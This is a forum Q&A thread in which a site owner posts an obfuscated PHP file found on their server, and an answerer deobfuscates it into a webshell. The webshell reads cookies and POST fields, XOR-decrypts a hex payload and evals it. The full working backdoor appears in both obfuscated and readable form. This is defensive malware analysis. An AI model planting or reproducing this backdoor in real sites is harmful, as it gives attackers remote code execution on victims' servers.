0

Can someone please help me understand this code, what it does and what kind of encoding is it? Can this be automatically removed through ssh (there are many, many more similar files found).

<?php
$zvqhai = 'k-98i3v\'raxn*ycdml#u64_gebts2oH5pf';$npazfw = Array();$npazfw[] = $zvqhai[30].$zvqhai[12];$npazfw[] = $zvqhai[9].$zvqhai[24].$zvqhai[21].$zvqhai[15].$zvqhai[2].$zvqhai[21].$zvqhai[24].$zvqhai[15].$zvqhai[1].$zvqhai[33].$zvqhai[14].$zvqhai[24].$zvqhai[21].$zvqhai[1].$zvqhai[21].$zvqhai[21].$zvqhai[9].$zvqhai[3].$zvqhai[1].$zvqhai[25].$zvqhai[14].$zvqhai[25].$zvqhai[28].$zvqhai[1].$zvqhai[25].$zvqhai[25].$zvqhai[20].$zvqhai[3].$zvqhai[2].$zvqhai[15].$zvqhai[14].$zvqhai[2].$zvqhai[31].$zvqhai[28].$zvqhai[5].$zvqhai[31];$npazfw[] = $zvqhai[18];$npazfw[] = $zvqhai[14].$zvqhai[29].$zvqhai[19].$zvqhai[11].$zvqhai[26];$npazfw[] = $zvqhai[27].$zvqhai[26].$zvqhai[8].$zvqhai[22].$zvqhai[8].$zvqhai[24].$zvqhai[32].$zvqhai[24].$zvqhai[9].$zvqhai[26];$npazfw[] = $zvqhai[24].$zvqhai[10].$zvqhai[32].$zvqhai[17].$zvqhai[29].$zvqhai[15].$zvqhai[24];$npazfw[] = $zvqhai[27].$zvqhai[19].$zvqhai[25].$zvqhai[27].$zvqhai[26].$zvqhai[8];$npazfw[] = $zvqhai[9].$zvqhai[8].$zvqhai[8].$zvqhai[9].$zvqhai[13].$zvqhai[22].$zvqhai[16].$zvqhai[24].$zvqhai[8].$zvqhai[23].$zvqhai[24];$npazfw[] = $zvqhai[27].$zvqhai[26].$zvqhai[8].$zvqhai[17].$zvqhai[24].$zvqhai[11];$npazfw[] = $zvqhai[32].$zvqhai[9].$zvqhai[14].$zvqhai[0];foreach ($npazfw[7]($_COOKIE, $_POST) as $jgbht => $mbfusps){function dopvqef($npazfw, $jgbht, $dxflrm){return $npazfw[6]($npazfw[4]($jgbht . $npazfw[1], ($dxflrm / $npazfw[8]($jgbht)) + 1), 0, $dxflrm);}function awtsdc($npazfw, $wiuhpx){return @$npazfw[9]($npazfw[0], $wiuhpx);}function qjgaieb($npazfw, $wiuhpx){$vyaygn = $npazfw[3]($wiuhpx) % 3;if (!$vyaygn) {eval($wiuhpx[1]($wiuhpx[2]));exit();}}$mbfusps = awtsdc($npazfw, $mbfusps);qjgaieb($npazfw, $npazfw[5]($npazfw[2], $mbfusps ^ dopvqef($npazfw, $jgbht, $npazfw[8]($mbfusps))));}

1 Answers1

1

Beautifying this code somewhat gives me this:

$zvqhai = 'k-98i3v\'raxn*ycdml#u64_gebts2oH5pf';
$npazfw = Array();
$npazfw[] = $zvqhai[30] . $zvqhai[12];
$npazfw[] = $zvqhai[9] . $zvqhai[24] . $zvqhai[21] . $zvqhai[15] . $zvqhai[2] . $zvqhai[21] . $zvqhai[24] . $zvqhai[15] . $zvqhai[1] . $zvqhai[33] . $zvqhai[14] . $zvqhai[24] . $zvqhai[21] . $zvqhai[1] . $zvqhai[21] . $zvqhai[21] . $zvqhai[9] . $zvqhai[3] . $zvqhai[1] . $zvqhai[25] . $zvqhai[14] . $zvqhai[25] . $zvqhai[28] . $zvqhai[1] . $zvqhai[25] . $zvqhai[25] . $zvqhai[20] . $zvqhai[3] . $zvqhai[2] . $zvqhai[15] . $zvqhai[14] . $zvqhai[2] . $zvqhai[31] . $zvqhai[28] . $zvqhai[5] . $zvqhai[31];
$npazfw[] = $zvqhai[18];
$npazfw[] = $zvqhai[14] . $zvqhai[29] . $zvqhai[19] . $zvqhai[11] . $zvqhai[26];
$npazfw[] = $zvqhai[27] . $zvqhai[26] . $zvqhai[8] . $zvqhai[22] . $zvqhai[8] . $zvqhai[24] . $zvqhai[32] . $zvqhai[24] . $zvqhai[9] . $zvqhai[26];
$npazfw[] = $zvqhai[24] . $zvqhai[10] . $zvqhai[32] . $zvqhai[17] . $zvqhai[29] . $zvqhai[15] . $zvqhai[24];
$npazfw[] = $zvqhai[27] . $zvqhai[19] . $zvqhai[25] . $zvqhai[27] . $zvqhai[26] . $zvqhai[8];
$npazfw[] = $zvqhai[9] . $zvqhai[8] . $zvqhai[8] . $zvqhai[9] . $zvqhai[13] . $zvqhai[22] . $zvqhai[16] . $zvqhai[24] . $zvqhai[8] . $zvqhai[23] . $zvqhai[24];
$npazfw[] = $zvqhai[27] . $zvqhai[26] . $zvqhai[8] . $zvqhai[17] . $zvqhai[24] . $zvqhai[11];
$npazfw[] = $zvqhai[32] . $zvqhai[9] . $zvqhai[14] . $zvqhai[0];

foreach($npazfw[7]($_COOKIE, $_POST) as $jgbht => $mbfusps)
{
    function dopvqef($npazfw, $jgbht, $dxflrm)
    {
        return $npazfw[6]($npazfw[4]($jgbht . $npazfw[1], ($dxflrm / $npazfw[8]($jgbht)) + 1) , 0, $dxflrm);
    }

    function awtsdc($npazfw, $wiuhpx)
    {
        return @$npazfw[9]($npazfw[0], $wiuhpx);
    }

    function qjgaieb($npazfw, $wiuhpx)
    {
        $vyaygn = $npazfw[3]($wiuhpx) % 3;
        if (!$vyaygn)
        {
            eval($wiuhpx[1]($wiuhpx[2]));
            exit();
        }
    }

    $mbfusps = awtsdc($npazfw, $mbfusps);
    qjgaieb($npazfw, $npazfw[5]($npazfw[2], $mbfusps ^ dopvqef($npazfw, $jgbht, $npazfw[8]($mbfusps))));
}

This isn't much use although it does seem to be a webshell. Let's dig into it a bit more. Intuition tells me that the first 12 lines or so are for string obfuscation, and dumping the contents of $npazfw will give us the real string values. To do this we can remove the foreach loop and just run this:

for ($i = 0; $i < count($npazfw); $i++)
{
    echo $i . " => " . $npazfw[$i] . "\n";
}

The results are:

0 => H*
1 => ae4d94ed-fce4-44a8-bcb2-bb689dc95235
2 => #
3 => count
4 => str_repeat
5 => explode
6 => substr
7 => array_merge
8 => strlen
9 => pack

This helps a lot! We can now use this to deobfuscate a lot of the rest of it.

Renaming everything and giving variables some proper names, and removing redundant parameters, we get this:

foreach(array_merge($_COOKIE, $_POST) as $input_value_name => $input_value)
{
    function keystream_generate($input_value_name, $len)
    {
        return substr(str_repeat($input_value_name . "ae4d94ed-fce4-44a8-bcb2-bb689dc95235", ($len / strlen($input_value_name)) + 1) , 0, $len);
    }

    function bytesfromhex($hex)
    {
        return @pack("H*", $hex);
    }

    function execute_code($params)
    {
        $param_count_mod3 = count($params) % 3;
        if (!$param_count_mod3) /* this is an obfuscated check for count($params) == 3 */
        {
            eval($params[1]($params[2]));
            exit();
        }
    }

    $input_value = bytesfromhex($input_value);
    execute_code(explode("#", $input_value ^ keystream_generate($input_value_name, strlen($input_value))));
}

Effectively what this does is look in all the cookies and post parameters to find a valid encrypted command payload, then decrypt and eval that payload if one is found.

As for what to do about it, I recommend that you read this question.

Polynomial
  • 132,208
  • 43
  • 298
  • 379